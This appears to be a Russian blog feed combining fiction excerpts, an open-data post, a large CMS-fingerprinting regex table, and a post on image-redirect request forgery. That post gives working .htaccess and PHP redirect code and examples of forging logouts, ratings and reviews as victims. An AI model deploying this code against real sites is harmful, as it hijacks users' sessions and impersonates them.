8 ball Annyhilator C++ Java MaZaHaKa MTV php Sape Uratsakidogi Аватары Актеры Библиотека Хакера Бумбокс Взлом Владимир Толоконников Вселенная Гена Рыжов Генератор ответов Ильяс Гаптрахманов Как правильно искать в Google Как сделать активную кнопку самому Картинки Кино Киса Кнопка на рабочий стол как в фильме "Хоттабыч" Кнопка на рабочий стол как в фильме "Хоттабыч Кнопка слива Кнопки на робочем столе Код Конкурс от хоттабыча Курсоры Курсоры для сайта Лива Круминя Линукс Ляпис Трубецкой Магический шар Марк Гейхман Марюс Ямпольскис Мастдай Мила Липнер Мир Многоточие Награды Никита Хлебанцов Ольга Дегтярёва Петр Точилин Прикольные курсоры Проги Программы Гены Рабочий стол Гены Рассказ Режиссер фильма Реплики Саундтрек Скринмейты Скрипт Скрипт php Скрипты Статьи хацкеров Сценарий фильма Хоттабыч Тиц Три желания Хоттабыча Файловая структура в массив Файловый путь в многомерный массив Фантастика Фильм Хоттабыч Фразы функция возведения в степень Футболки Хоттабыч Хоттабыча на сайт Чат бот Киса Чат боты Шайтаныч шар судьбы Шелл Катя шифрование Шкала размеров Энни Юзербары Юлия Паранова Яндекс

5 декабря 2017

5 декабря 2017

29 ноября 2017

Всем добрый день!

Благодаря данной уязвимости можно посылать GET запросы на любые сайты от имени пользователя с его Куками и правами на сайте

Предистория

Вчера я разместил на одном сайте картинку со своего сайта, а потом подумал, хм... а почему бы мне не поменять текст в картинке в зависимости от времени суток. Не долго думая, я переделал картинку в динамически генерируемую картинку на PHP и успешно подменял надпись на нужную мне. Плюс ко всему, я получил еще несколько полезных данных о пользователе, его IP и реферер страницы с которой картинка была запрошена. Потом я вспомнил про статью , которую когда то читал Xss без Xss. В ней рассказывалась старая уязвимость запроса браузером произвольной страницы от имени пользователя через картинку с контролируемого сайта, которая добавляется на страницу сайта который позволяет добавлять картинки с удаленных ресурсов или в BBCode [img]. Соответственно тогда были уязвимы все форумы, гостевые и прочие сайты, очень советую ту статью к прочтению. Эту уязвимость судя по самой теме и комментам скорее всего закрыли, подумал я, но....

Я попробовал сделать редирект в картинке и уязвимость сработала! Браузер успешно запросил страницу абсолютно другого домена и получил ее контент! Протестировал тоже самое через HTTPS, все так же работает. Я начал разбираться как так произошло, ведь вроде уязвимость была закрыта как я понял из того поста и, посмотрев отладчик браузера я сначала понял что виною подгрузка контента страницы в javascript Ajax запросе, позже попробовал сделать статичную страницу и проверить пройдет ли! Прошло, меня снова выкинуло из админки моего сайта. Т.е получается что редирект успешно срабатывает при любых обстоятельствах.

Так я и не понял, изобрел ли я колесо, описанное много лет назад в той статье и это баянище, либо уязвимость снова открылась , если ее все же закрывали.

Судя по статусу статьи (Тема закрыта для ответов) и по комментариям:

Какинтош:08/09/2008 - эта дыра еще актуальна?

Thanat0z:08/09/2008 - На форуме запрещена некрофилия...

Я подумал что уязвимость закрыта, соответственно когда читал первый раз не стал проверять. В этом была моя ошибка: надо всегда проверять все баги, пускай даже закрытые. Ведь все меняется, старое закрытое иногда может снова заработать из-за каких то нововведений...

Благодаря данной уязвимости можно посылать GET запросы на любые сайты от имени пользователя с его Куками и правами на сайте. Области применения такой уязвимоти очень широкий, начиная от простого баловства с убиваем сессий у пользователя на чужих сайтах, до ддос атак на сайты, более подробно описано в старой статье.

Конечно античат знал, об этом и ввел токен на подтверждения дейcтвия, без передачи которого не получится выполнить выход из профиля, иначе вы бы смогли сейчас ощутить действие данной уязвимости на себе))

Что касается того сайта для которого я изначально делал динамическую картинку, то на нем я нашел несколько таких GET уязвимостей:

1. Разлогинивание на сайте http://site.ru/logout/

2. Накрутка рейтинга моего аккаунта http://site.ru/account/set_rate/?rate=5

3. Автоматический постинг отзыва от имени того пользователя, который открыл страницу с картинкой http://site.ru/account/?add_review=1&text=Отличный разраб!


Скрипты для создания такой картинки на вашем хостинге:

1 Необходимо перенаправить все запрашиваемые картинки в директории сайта на какой нибудь файл, у меня к коде это будет файл image.php

Для этого надо создать файл в директории .htaccess с таким содержимым, если у вас сервер работает под апачем, для nginx по другому настраивается:

DirectoryIndex index.php
Options -Indexes
# Comment the following line, if option Multiviews not allowed here
Options -MultiViews
Header set Access-Control-Allow-Origin *
AddDefaultCharset utf-8
<ifModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{REQUEST_URI} \.(js|css|jpg|jpeg|gif|png)$
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule ^(.*)$ image.php [L,QSA]
</ifModule>

Файл может отличаться, главное для подмены картинок находится внутри <ifModule mod_rewrite.c>......</ifModule>

2. Необходимо в той же папке создать файл image.php с таким кодом:

<?php
header( 'Expires: Sat, 26 Jul 1997 05:00:00 GMT' ); /* Отключаем кеширование */
header( 'Last-Modified: ' . gmdate( 'D, d M Y H:i:s' ) . ' GMT' ); /* Отключаем кеширование */
header( 'Cache-Control: no-store, no-cache, must-revalidate' ); /* Отключаем кеширование */
header( 'Cache-Control: post-check=0, pre-check=0', false ); /* Отключаем кеширование */
header( 'Pragma: no-cache' ); /* Отключаем кеширование */
/*  А вот сам редирект */
header("Location: http://site.ru/page/");
/* 
    Также можно добавить GET параметр к картинке куда переходить
    тогда можно будет передавать в ссылке на картинку ссылку для самомго редиректа,
    но такой подход не рекоммендуется
 */
if(array_key_exists('url',$_GET) && !empty($_SERVER['HTTP_REFERER'])) {
    $URI = parse_url($_SERVER['HTTP_REFERER']);
    header("Location: ".htmlspecialchars($_GET['url'])."");
} else {
    header("Location: http://site.ru/page/");
}
exit;
?>


9 декабря 2016

Источник данных

На сайте представлены исключительно открытые и общедоступные сведения обо всех зарегистрированных на территории Российской Федерации юридических лицах, содержащиеся в государственных реестрах. Данные являются открытыми и общедоступными на основании Федерального закон от 8 августа 2001 года № 121-ФЗ "О ГОСУДАРСТВЕННОЙ РЕГИСТРАЦИИ ЮРИДИЧЕСКИХ ЛИЦ И ИНДИВИДУАЛЬНЫХ ПРЕДПРИНИМАТЕЛЕЙ".

Сайт https://огрн.онлайн переехал на https://ru.rus.company/

Статья сделана для поддержки проекта открытых данных!

Почему мы это делаем?

В какой-то момент мне для одного проекта потребовался список всех юридических лиц России, т.е. база данных ЕГРЮЛ. Я посмотрел, что эти данные являются публичными и общедоступными на основании ст. 51 Гражданского Кодекса, а также Федерального закона от 08.08.2001 №129-ФЗ «О государственной регистрации юридических лиц и индивидуальных предпринимателей».

Однако, как оказалось, существуют приказ и положения, в соответствии с которыми ФНС России продаёт публичные и общедоступные данные за 300 тыс рублей в год (150 тыс за ЕГРИП и 150 тыс за ЕГРЮЛ). Детальная информация на официальном сайте ФНС России. Меня эта ситуация в крайней степени возмутила, поэтому я написал президенту обращение через сайт. Однако моё обращение передали в ФНС России, которая ответила, что всё законно, так как она предоставляет открытые данные на сайте egrul.nalog.ru бесплатно. Данные там предоставляются после ввода каптчи, а результат в PDF. Т.е. совсем не годится для какой-либо автоматизированной обработки. А вот если хотите обрабатывать автоматически, то извольте заплатить 300 тыс.

Идея сделать эти данные действительно публичными и общедоступным появилась в декабре 2015 года. Непосредственно работа над проектом началась в начале февраля 2016 года. Я купил доступ к этим данным и разместил их на этом. В отличие от 1001 другого сайта (в том числе СПАРК Интерфакс), размещающего информацию из ЕГРЮЛ, у меня вся информация представлена бесплатно в полном объёме, в котором она есть в государственных реестрах, т.е. пользователям не нужно платить, чтобы увидеть учредителей организации или её бухгалтерскую отчётность.

Ключевым элементом всего проекта является бесплатное и публичное API, чтобы любой сервис мог свободно использовать данные, представленные на сайте. Я считаю, что если дать возможность другим программистам сделать вокруг этих данных свои приложения, то на рынке появится огромное количество нужных и полезных сервисов, вроде проверки контрагентов, автоматического заполнения реквизитов организации в формах для юр лиц и много всего другого, о чём мы сейчас даже не догадываемся.

Данные взяты с https://ru.rus.company/о-базе-данных/

20 января 2016

Организация десятилетия фильма!

Читать далее →

20 апреля 2015

– Хочешь хорошо жить и не ходить на работу? – спросил немолодой мужчина в спортивном костюме курьера, который принес ему пиццу.
– Все хотят, а что? – пожал плечами курьер.
– А я тебя научу. – мужчина протянул ему руку. – Дядя Витя.
– Андрей. – пожал протянутую руку курьер.
– Если тебя примут, будешь жить в шоколаде.
– У вас что, секта какая-то? Или спецслужбы?
– Да нет! Не секта, не шпионы, не масоны. И не сетевой маркетинг. Даже не филателисты.
– А кто вы тогда?
– Хорошие люди.
– Как-то мутновато звучит. Не, спасибо, мне это не нужно. – усмехнулся Андрей и стал жевать быстрее, чтобы уйти.
– Да ты выслушай! Мы… – дядя Витя внезапно захрипел, выронил пиццу и свалился со стула на пол...

Продолжить чтение

Читать далее →

9 апреля 2015

– Видишь, вот он. А ты не верила! – негромко, но торжествующе сказал Олег Наташе, когда они подошли к стеклянному боксу, расположенному посреди лаборатории.
Действительно, за стеклом на стуле развалился очень странный тип, чем-то похожий на клоуна – на нем был черный фрак с бабочкой, а его ноги были обуты в лапти. Заметив Олега и Наташу, тип резво вскочил на ноги и учтиво поклонился.
– Апполинарий! – представился он. – Крайне рад нашей встрече.
– Так вы из будущего или из прошлого? – спросила Наташа Апполинария.
– Наташ, не из будущего и не из прошлого, а из параллельной Вселенной. Апполинарий наш современник, но живет в альтернативной реальности. – объяснил Олег.

Продолжить чтение

Читать далее →

27 декабря 2014

таблица:

Название категория заголовки мета-теги код урл использует
1C-Bitrix cms X-Powered-CMS: Bitrix Site Manager
Set-Cookie: BITRIX_
- <link[^>]+components/bitrix|(src|href)=\»/bitrix/(js|templates)
1c-bitrix
<link[^>]+components\/bitrix|<script[^>]+1c\-bitrix|(href|src)=»\/bitrix\/(templates|images|components)\/|href=»\/bitrix\/rk.php\?id=
- 0: PHP
1und1 онлайн- магазины - - - /shop/catalog/browse\?sessid= 0: PHP
2z Project cms - generator: 2z project <meta name=(«|’)generator(«|’) [^>]+2z project - -
3dCart cms X-Powered-By: 3DCART - (twlh(track)?\\.asp|3d_upsell\\.js) - -
Accessible Portal cms - generator: Accessible Portal - - 0: PHP
AddThis виджеты - - addthis\\.com/js - -
Adobe CQ5 cms - - <div class=\\\»[^\\\"]*parbase /etc/designs/ 0: Java
Adobe GoLive редакторы кода - generator: Adobe GoLive - - -
Advanced Web Stats системы статистики - - aws\\.src = [^<]+caphyon-analytics - 0: Java
Alloy javascript-фреймворки - - ^AUI$ - -
Ametys cms - generator: (Ametys|Anyware Technologies) - - 0: Java
Amiro.CMS cms - generator: Amiro system_js\\.php\\?script=


<meta name=(«|’)generator(«|’) [^>]+Amiro
- 0: PHP
AMPcms cms X-AMP-Version: .*
Set-Cookie: AMP=
- ^amp_js_init$ - 0: PHP
AngularJS javascript-фреймворки - - ^angular$ - -
AOLserver web-серверы Server: AOLserver - - - -
Apache web-серверы Server: (Apache($|[^-])|HTTPD) - - - -
Apache JSPWiki вики - - <html[^>]* xmlns:jspwiki=
jspwiki
wiki\.jsp -
Apache Tomcat web-серверы Server: Apache-Coyote - - - -
Apache Traffic Server web-серверы Server: YTS - - - -
Arc Forum доски сообщений - - ping\\.src = node\\.href; - -
AsciiDoc cms - generator: ^AsciiDoc ^asciidoc$ - -
ATG Web Commerce онлайн- магазины X-ATG-Version: ATG - <[^>]+_DARGS - -
Atlassian Confluence вики - - Powered by <a href=.+atlassian\\.com/software/confluence - 0: Java
Atlassian Jira тикет-системы - - ^jira$

Powered by <a href=.+atlassian\\.com/software/jira
- 0: Java
AWStats системы статистики - generator: AWStats - - 0: Perl
Backbone.js javascript-фреймворки - - ^Backbone$
backbone.*\\.js
- 0: Underscore.js
Banshee cms - - Built upon the <a href=\\\»[^>]+banshee-php\\.org - 0: PHP
BIGACE cms - generator: BIGACE Powered by <a href=\\\»[^>]+BIGACE|<!—\\s+Site is running BIGACE - -
Bigcommerce онлайн-магазины - - <link href=+cdn\\d+\\.bigcommerce\\.com/v
cdn\\d+\\.bigcommerce\\.com/v
^compareProducts$
+\\.mybigcommerce\\.com -
Bigcommerce онлайн-магазины - - <link href=+cdn\\d+\\.bigcommerce\\.com/v
cdn\\d+\\.bigcommerce\\.com/v
^compareProducts$
+\\.mybigcommerce\\.com -
BigDump менеджеры баз данных - - <!— <h1>BigDump: Staggered MySQL Dump Importer - PHP
Bigware онлайн-магазины «Set-Cookie»:»bigwareCsid|bigWAdminID» - Diese <a href=.+bigware\\.de
<a href=.+/main_bigware_\\d+\\.php
(\\?|&)bigWAdminID=[a-z\\d]+(&|$) PHP
Blip.tv видеоплееры - - <(param|embed|iframe)[^>]+blip\\.tv/play - -
Blogger блоги - «generator»:»blogger» - ^(www.)?.+\\.blogspot\\.com -
BrowserCMS cms - «generator»:»BrowserCMS» - - Ruby
BPanel - - - href.*bpanel\.net.*BPanel
rel=»stylesheet» href=»\/(includes|content)\/css\/(main|styles|style|sheet)\.css»
type=»text\/javascript» src=»includes\/(menu|scripts)\.js»
src=»\/admin\/modules\/thumbnail\.php\?img=\/
abp.*\Wbpanel
Сайт создан [\s\S]{0,100}BPanel CMS
- -
Bugzilla тикет-системы - «- <[^>]+(id|title|name)=(«|’)bugzilla - Ruby
Burning Board доски сообщений - - <a href=\\\»[^>]+woltlab\\.com.+Burning Board - PHP
Business Catalyst cms - - CatalystScripts
<!— BC_OBNW —>
- Ruby
CakePHP web-фреймворки Set-Cookie: cakephp= application-name: CakePHP - - PHP
Cargo cms - cargo_title: .* <link [^>]+Cargo feed
/cargo\.
- PHP
CentOS операционные системы Server: CentOS
X-Powered-By: CentOS
- - - -
CFML языки программирования - - - - -
CacheFly сети доставки кода (CDN) Server: ^CFS
X-CF1: .+
X-CF2: .+
- - - -
Chameleon cms - generator: chameleon-cms - - Apache
PHP
Chamilo системы управления обучением X-Powered-By: Chamilo generator: Chamilo - - PHP
Chartbeat системы статистики - - function loadChartbeat\\(\\) { - -
Cherokee web-серверы Server: Cherokee - - - -
CKEditor редакторы расширенной разметки - - ^CKEDITOR$ - PHP
ClickHeat системы статистики - - clickheat.*\\.js
^clickHeatBrowser$
- PHP
ClickTale системы статистики - - if\\(typeof ClickTale(Tag)*==\\\»function\\\»\\)
^ClickTale
- -
Clicky системы статистики - - static\\.getclicky\\.com
^clicky$
- -
CloudFlare сети доставки кода (CDN) Server: cloudflare - ^CloudFlare$ - -
CMS Made Simple cms - generator: CMS Made Simple <meta name=(«|’)generator(«|’) [^>]+CMS Made Simple - PHP
CO2Stats системы статистики - - src=.+co2stats\\.com/propres\\.php - -
CodeIgniter web-фреймворки Set-Cookie: (exp_last_activity|exp_tracker|ci_session) - - - PHP
Commerce Server онлайн- магазины COMMERCE-SERVER-SOFTWARE: .+ - - - Microsoft ASP.NET
IIS
Windows Server
comScore системы статистики - - <i{1}frame[^>]* (id=\\\»comscore\\\»|scr=[^>]+comscore)
^_?COMSCORE$
- -
Concrete5 cms - generator: concrete5 concrete/js/
^CCM_IMAGE_PATH$
- PHP
Connect web-фреймворки X-Powered-By: ^Connect$ - - - node.js
Contao cms - - (<!—.+powered by (TYPOlight|Contao)—>|<link[^>]+(typolight|contao)\\.css) - PHP
Contenido cms - generator: Contenido - - PHP
Contens cms - generator: contens - - Java
CFML
ConversionLab системы статистики - - conversionlab\\.trackset\\.com/track/tsend\\.js - -
Coppermine фотогалереи - - <!—Coppermine Photo Gallery - PHP
Cosmoshop онлайн- магазины - - cosmoshop_functions\\.js - -
Cotonti cms - generator: Cotonti - - PHP
CouchDB web-серверы Server: CouchDB - - - -
cPanel хостинг-панели Server: cpsrvd - <!— cPanel - -
cutephp - - - Content Management Powered by .{0,50}<a href=»http:\/\/cutephp\.com\/» - -
CPG Dragonfly cms X-Powered-By: Dragonfly CMS generator: CPG Dragonfly - - PHP
Crazy Egg системы статистики - - cetrk\\.com/pages/scripts/\\d+/\\d+\\.js - -
Cross Pixel системы статистики - - tag\\.crsspxl\\.com/s1\\.js - -
CS Cart онлайн- магазины - -  Powered by (<a href=.+cs-cart\\.com|CS-Cart)
^fn_compare_strings$
- PHP
CubeCart онлайн- магазины - generator: cubecart (Powered by <a href=.+cubecart\\.com|<p[^>]+>Powered by CubeCart) - PHP
Cufon скрипты для подключения шрифтов - - cufon-yui\\.js
^Cufon$
- -
d3 javascript-графика - - d3(\\.v2)(\\.min)?\\.js - -
Dancer web-фреймворки X-Powered-By: Perl Dancer
Server: Perl Dancer
- - - Perl
Danneo CMS cms X-Powered-By: CMS Danneo.* generator: Danneo - - Apache
PHP
dashCommerce онлайн- магазины - - - - Microsoft ASP.NET
IIS
Windows Server
DataLife Engine cms - generator: DataLife Engine ^dle_root$
<meta name=(«|\’)generator(«|\’) [^>]+DataLife Engine
@import url\\(/templates/[^/]+/css/engine\\.css\\);
/engine/ajax/dle_ajax\\.js
var dle_root
var dle_del_agree
<!— DataLife Engine Copyright
onclick=»dleRate
id=\’dle-content\’
id=\’dle-info\’
- PHP
Apache
David Webbox web-серверы Server: David-WebBox - - - -
Debian операционные системы Server: Debian
X-Powered-By: (Debian|dotdeb|etch|lenny|squeeze|wheezy)
- - - -
DedeCMS cms - - ^Dede
dedeajax
- PHP
Demandware онлайн- магазины Server: Demandware eCommerce Server - ^dwAnalytics$
<[^>]+demandware.edgesuite
- -
DHTMLX javascript-фреймворки - - dhtmlxcommon\\.js - -
DirectAdmin хостинг-панели - - <a[^>]+>DirectAdmin</a> Web Control Panel - PHP
Apache
Disqus системы комментирования - - <div[^>]+id=\\\»disqus_thread\\\»
disqus_url
^DISQUS$
- -
Django web-фреймворки - - powered by <a[^>]+>Django - Python
Django CMS cms Set-Cookie: django - media/cms/js/csrf\\.js - Django
Dojo javascript-фреймворки - - dojo(\\.xd)?\\.js
^dojo$
- -
Dokeos системы управления обучением X-Powered-By: Dokeos generator: Dokeos Portal <a[^>]+>Dokeos
@import \\\»[^\\\"]+dokeos_blue
- PHP
xajax
jQuery
CKEditor
DokuWiki вики - generator: DokuWiki - - PHP
DotNetNuke cms X-Compressed-By: DotNetNuke
Set-Cookie: DotNetNukeAnonymous=.+
generator: DotNetNuke <!— by DotNetNuke Corporation
^DotNetNuke$
- Microsoft ASP.NET
Doxygen утилиты для создание документации - - (<!— Generated by Doxygen
<link[^>]+doxygen.css)
- -
DreamWeaver редакторы кода - - (<!—[^>]*(InstanceBeginEditable|Dreamweaver[^>]+target|DWLayoutDefaultTable)
function MM_preloadImages\\(\\) {)
- -
Drupal cms X-Drupal-Cache: .*
X-Generator: Drupal
Expires: 19 Nov 1978
- Drupal(\.extend)?.+settings
<(link|style)[^>]+sites/(default|all)/(themes|modules)/
drupal\.js
^Drupal$
class=»block block-block»
class=»clear-block clear»
class=»clear-block»
id=»block-(block|menu|nice_menus)-\d+»
id=»container» class=»clear-block»
<input type=»hidden» name=»form_id» id=»edit-user-login-block» value=»user_login_block» \/>
- PHP
Drupal Commerce онлайн- магазины - - id=\\\»block[_-]commerce[_-]cart[_-]cart|class=\\\»commerce[_-]product[_-]field - Drupal
Dynamicweb онлайн- магазины Set-Cookie: Dynamicweb= generator: Dynamicweb - - Microsoft ASP.NET
e107 cms - - e107\\.js - PHP
EdgeCast сети доставки кода (CDN) Server: ^ECS - - - -
EPiServer cms - generator: EPiServer - - Microsoft ASP.NET
IIS
Windows Server
EPrints разное - generator: EPrints - - Perl
Exhibit javascript-графика - - exhibit.*\\.js - -
Express web-фреймворки X-Powered-By: ^Express$ - - - Connect
node.js
ExpressionEngine cms Set-Cookie: (exp_last_activity|exp_tracker) - - - PHP
ExtJS javascript-фреймворки - - ext-base\\.js - -
eZ Publish undefined X-Powered-By: ^eZ Publish generator: eZ Publish - - PHP
Fact Finder поисковые системы - - /images/fact-finder\.gif
ViewParametricSearch
factfinder
Suggest\.ff
ViewParametricSearch
factfinder
ffsuggest
-
FAST ESP поисковые системы - - fastsearch
searchProfile=
searchCategory=
esppublished
searchProfile=
searchCategory=
-
FAST Search for SharePoint поисковые системы - - - Pages/SearchResults\.aspx\?k= Microsoft SharePoint
Microsoft ASP.NET
FlexCMP cms X-Powered-By: FlexCMP generator: FlexCMP - - -
FluxBB доски сообщений - - Powered by (<strong>)?<a href=\\\»[^>]+fluxbb - -
Flyspray тикет-системы - - (<a[^>]+>Powered by Flyspray
<map id=\\\»projectsearchform
Powered by <a href=.+flyspray\\.org)
- -
FreeBSD операционные системы Server: FreeBSD - - - -
FrontPage редакторы кода - generator: Microsoft FrontPage <html[^>]+urn:schemas-microsoft-com:office:office - -
FWP онлайн- магазины - generator: FWP Shop - - -
Gallery фотогалереи - - <div id=\\\»gsNavBar\\\» class=\\\»gcBorder1\\\»>
^galleryAuthToken$
- -
Gambio онлайн- магазины - - <link[^>] href=\\\»templates/gambio/
<a[^>]content\\.php\\?coID=\\d
<!— gambio eof —>
- PHP
Gauges системы статистики - - ^_gauges$
t\\.src = ‘//secure\\.gaug\\.es/track\\.js
- -
Gentoo операционные системы X-Powered-By: -?gentoo - - - -
Get Satisfaction тикет-системы - - var feedback_widget = new GSFN\\.feedback_widget\\(feedback_widget_options\\) - -
GetSimple CMS cms - generator: GetSimple - - PHP
Google Analytics системы статистики Set-Cookie: __utma - _gaq\.push\(\['_setAccount
(\.google-analytics\.com/ga\.js|google-analytics\.com/urchin\.js)
^gaGlobal$
- -
Google App Engine web-серверы Server: Google Frontend - - - -
Google Code Prettify разное - - ^prettyPrint$ - -
Google Font API скрипты для подключения шрифтов - - <link[^>]* href=.+fonts\.googleapis\.com
googleapis.com/.+webfont
^WebFonts$
- -
Google Maps виджеты - - (maps\\.google\\.com/maps\\?file=api|maps\\.google\\.com/maps/api/staticmap) - -
Google Sites cms - - - sites.google.com -
Google Tag Manager разное - - googletagmanager\\.com/ns\\.html[^>]+></iframe> - -
Google Web Toolkit web-фреймворки - - ^__gwt_ - Java
GoStats системы статистики - - ^_go(stats|_track) - -
Graffiti CMS cms - generator: Graffiti CMS - - -
Gravatar разное - - ^Gravatar$ - -
Gravity Insights системы статистики - - gravityInsightsParams\.site_guid = ‘
^GravityInsights$
- -
GX WebManager cms - generator: GX WebManager - - -
Handlebars javascript-фреймворки - - ^Handlebars$ - -
Hiawatha web-серверы Server: Hiawatha - - - -
Highcharts javascript-графика - - highcharts.*\\.js
^Highcharts$
- -
Hotaru CMS cms - generator: Hotaru CMS - - -
Hybris онлайн- магазины Set-Cookie: _hybris - (/sys_master/|/hybr/|/_ui/desktop/) - Java
IBM HTTP Server web-серверы Server: IBM_HTTP_Server - - - -
IBM WebSphere Portal cms IBM-Web2-Location: .* - - /wps/ Java
IBM WebSphere Commerce онлайн- магазины - - - /wcs/ Java
IIS web-серверы Server: IIS - - - Windows Server
ImpressCMS cms X-Powered-By: ImpressCMS generator: ImpressCMS include/linkexternal\\.js - PHP
ImpressPages cms - generator: ImpressPages - - PHP
Indexhibit cms - generator: Indexhibit <(link|a href) [^>]+ndxz-studio - PHP
Apache
Exhibit
InstantCMS cms - generator: InstantCMS - - -
Intershop онлайн- магазины - - is-bin|INTERSHOP is-bin|INTERSHOP -
IPB доски сообщений - - <link[^>]+ipb_[^>]+\.css
jscripts/ips_
^IPBoard$
- -
iWeb редакторы кода - generator: ^iWeb - - -
Jalios cms - generator: Jalios - - -
Java языки программирования Set-Cookie: JSESSIONID - - - -
Javascript Infovis Toolkit javascript-графика - - jit.*\\.js
^\\$jit$
- -
Jirafe системы статистики - - /jirafe\\.js
^jirafe$
- -
Jo javascript-фреймворки - - ^jo(Cache|DOM|Event)$ - -
JobberBase разное - generator: Jobberbase ^Jobber$ - -
Joomla cms X-Content-Encoded-By: Joomla generator: Joomla (<div[^>]+id=\\\»wrapper_r\\\»|<[^>]+(feed|components)/com_
<table[^>]+class=\\\»pill)
^jcomments$
<!\-\- JoomlaWorks «K2″
/component/option,com_.+?/itemid,\d+
/index.php?option=com_.+?&
/content/blogcategory/\d+/\d+(/|)
/content/view/\d+
/component/content/article/
/component/content/section/
/component/content/frontpage/
option=com_ PHP
jqPlot javascript-графика - - jqplot.*\\.js
^jQuery.jqplot$
- -
jQTouch mobile-фреймворки - - jqtouch.*\\.js
^jQT$
- -
jQuery javascript-фреймворки - - jquery.*\\.js
^jQuery$
- -
jQuery Mobile mobile-фреймворки - - jquery\\.mobile.*\\.js - -
jQuery Sparklines javascript-графика - - jquery\\.sparkline.*\\.js - -
jQuery UI javascript-фреймворки - - jquery-ui.*\\.js - jQuery
JS Charts javascript-графика - - jscharts.*\\.js
^JSChart$
- -
JTL Shop онлайн- магазины - - (<input[^>]+name=\\\»JTLSHOP|<a href=\\\»jtl\\.php) - -
K2 разное - - <!— JoomlaWorks \\\»K2\\\»
^K2RatingURL$
- Joomla
Kampyle тикет-системы Set-Cookie: k_visit - cf\\.kampyle\\.com/k_button\\.js
^k_track$
- -
Kentico CMS cms - generator: Kentico CMS - - -
KISSmetrics системы статистики - - ^KM_COOKIE_DOMAIN$ - -
Koego системы статистики - - tracking\\.koego\\.com/end/ego\\.js - -
Kohana web-фреймворки Set-Cookie: kohanasession
X-Powered-By: Kohana
- - - PHP
Kolibri CMS cms - generator: Kolibri - - -
Koobi cms - generator: Koobi - - -
Lasto cms - - Programming \<a href=\»http:\/\/lasto.com\/\»[\s\S]*?\>V.Lasto
<div id=\»nano\»>[\s\S]*<div class=\»nanotop\»>
- PHP
LEPTON cms - generator: LEPTON - - PHP
Liferay cms Liferay-Portal: .* - ^Liferay$ - -
LightMon Engine cms - - <!— Lightmon Engine Copyright Lightmon - PHP
lighttpd web-серверы Server: lighttpd - - - -
LimeSurvey разное generator: LimeSurvey - - - -
LiveJournal блоги - - - ^(www.)?.+\.livejournal\.com -
LiveInternet системы статистики - - - src=»http:\/\/i\.li\.ru\/ReActive\/js\/global\/ -
Lockerz Share виджеты - - addtoany\\.com/menu/page\\.js
^a2apage_init$
- -
Lotus Domino web-серверы Server: Lotus-Domino - - - -
Magento онлайн- магазины Set-Cookie: frontend= - (js/mage|skin/frontend/(default|enterprise))
^(Mage|VarienForm)$
- PHP
Mambo cms - generator: Mambo - - -
MantisBT тикет-системы - - <img[^>]+ alt=\\\»Powered by Mantis Bugtracker - -
Marketo автоматизация маркетинга - - munchkin\\.marketo\\.net/munchkin\\.js
^Munchkin$
- -
MaxSite CMS cms - generator: MaxSite CMS - - -
MediaElement.js видеоплееры - - ^mejs$ - -
MediaWiki вики - generator: MediaWiki (<a[^>]+>Powered by MediaWiki</a>
<[^>]+id=\\\»t-specialpages)
- -
Meebo виджеты - - (<iframe id=\\\»meebo-iframe\\\»|Meebo\\(‘domReady’\\)) - -
Microsoft ASP.NET web-фреймворки X-Powered-By: ASP\.NET
X-AspNet-Version: .+
- <input[^>]+name=\\\»__VIEWSTATE \.aspx?($|\?) IIS
Windows Server
Microsoft SharePoint cms MicrosoftSharePointTeamServices: .*
X-SharePointHealthScore: .*
SPRequestGuid: .*
SharePointHealthScore: .*
generator: Microsoft SharePoint - - -
MiniBB доски сообщений - - <a href=\\\»[^>]+minibb.+\\s+<!—End of copyright link - -
Mint системы статистики - - mint/\\?js
^Mint$
- -
Mixpanel системы статистики - - api\\.mixpanel\\.com/track
^Mixpanel$
- -
MochiKit javascript-фреймворки - - MochiKit\\.js
^MochiKit$
- -
Modernizr javascript-фреймворки - - modernizr.*\\.js
^Modernizr$
- -
MODx cms X-Powered-By: ^MODx
Set-Cookie: SN4[a-f\d]{12}|utmcct=/applications/modx
- <a[^>]+>Powered by MODx</a>
<(link|script)[^>]+assets/snippets/
var el= \$\(‘modxhost’\);
<script type=(«|’)text\/javascript(«|’)>var MODX_MEDIA_PATH = «media»
- PHP
MoinMoin вики - - moin.+/common/js/common\\.js
^show_switch2gui$
- Python
Mojolicious web-фреймворки x-powered-by: mojolicious - - - PERL
Mollom капчи - - <img[^>]+/.mollom/.com
mollom\.js
- -
Mondo Media онлайн- магазины - generator: Mondo Shop - - -
Mongrel web-серверы Server: Mongrel - - - Ruby
Moodle системы управления обучением Set-Cookie: MoodleSession - (var moodleConfigFn = function\\(me\\)
<img[^>]+moodlelogo)
- PHP
Moogo cms - - kotisivukone.js - -
MooTools javascript-фреймворки - - mootools.*\\.js
^MooTools$
- -
Movable Type cms - generator: Movable Type - - -
Mustache javascript-фреймворки - - ^Mustache$ - -
MyBB доски сообщений - - <script [^>]+\\s+<!—\\s+lang\\.no_new_posts
<a[^>]* title=\\\»Powered By MyBB
^MyBB$
- -
MyBlogLog виджеты - - pub\\.mybloglog\\.com - -
Mynetcap cms - generator: Mynetcap - - -
Nedstat системы статистики - - sitestat\(\».+nl\.sitestat\.com - -
Netmonitor системы статистики - - netmonitor\\.fi/nmtracker\\.js
^netmonitor$
- -
New Relic системы статистики - - <script[^>]+>(var NREUMQ=NREUMQ
if \\(!NREUMQ\\.f)
- -
Nginx web-серверы Server: nginx - - - -
node.js языки программирования - - - - -
NOIX разное - - <[^>]+(src|href)=[^>]*(/media/noix)
<!— NOIX
- -
nopCommerce онлайн-магазины - - (<!—Powered by nopCommerce
Powered by: <a[^>]+nopcommerce)
- -
Open Web Analytics системы статистики - - <!— (Start|End) Open Web Analytics Tracker —>
^_?owa_
- -
OneStat системы статистики - - var p==.+stat\\.onestat\\.com/stat\\.aspx\\?tagver - -
OpenCart онлайн-магазины - - index\\.php\\?route=[a-z]+/
Powered By <a href=\\\»[^>]+OpenCart
- PHP
openEngine cms - - <meta[^>]+openEngine - -
OpenGSE web-серверы Server: GSE - - - Java
OpenLayers виджеты - - openlayers
^OpenLayers$
- -
OpenNemas cms X-Powered-By: OpenNemas - - - -
OpenText
Web
Solutions
cms - - <!—[^>]+published by Open Text Web Solutions - Microsoft ASP.NET
Optimizely системы
статистики
- - ^optimizely$ - -
Oracle
Recommendations
On
Demand
системы
статистики
- - atgsvcs.+atgsvcs\\.js - -
